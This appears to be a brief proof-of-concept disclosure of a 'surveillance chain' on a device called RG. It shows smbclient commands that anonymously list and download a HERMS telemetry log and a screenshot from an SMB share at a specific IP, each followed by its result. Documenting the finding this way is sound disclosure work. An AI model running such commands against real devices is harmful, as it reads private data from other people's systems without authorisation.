Proof of Concept: Complete Surveillance Chain

Step 1: Access RG via SMB

smbclient //100.119.202.114/share -N -c 'cd roms/ports/hermes; ls'

Result: Lists hermes-launch.log, herms-sdl.log, herms_sdl_client.py, hermes.gptk, manual-relaunch.out

Step 2: Retrieve Telemetry Log

smbclient //100.119.202.114/share -N -c 'cd roms/ports/hermes; get herms-sdl.log /tmp/'

Result: 61-line structured log with probe results, spawn events, and capture confirmations

Step 3: Retrieve Screenshot

smbclient //100.119.202.114/share -N -c 'cd screenshots; get herms-sdl-internal-20260508-220201.png /tmp/'

Result: 25,623 byte PNG showing HERMS TUI internal state